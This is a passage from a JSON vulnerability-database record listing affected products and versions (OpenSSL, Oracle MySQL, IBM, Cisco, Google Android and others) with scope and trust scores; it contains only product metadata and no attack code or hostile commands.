}, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.1.0" }, { "model": "icewall federation agent", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "icewall mcrp", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "certd" }, { "model": "icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw" }, { "model": "icewall sso agent option", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "(linux edition )" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.4" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v8.5" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "cosminexus http server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "application server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "application server for developers", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "web server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "(64)" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base(64)" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "(64)" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "access manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.4.3.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.3.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "pixel xl", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "pixel c", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "pixel", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "nexus player", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7(2013)" }, { "model": "nexus 6p", "scope": null, "trust": 0.3, "vendor": "google", "version": null }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5x" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.1.1" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.1" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.1.1" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.2" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.4.4" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", 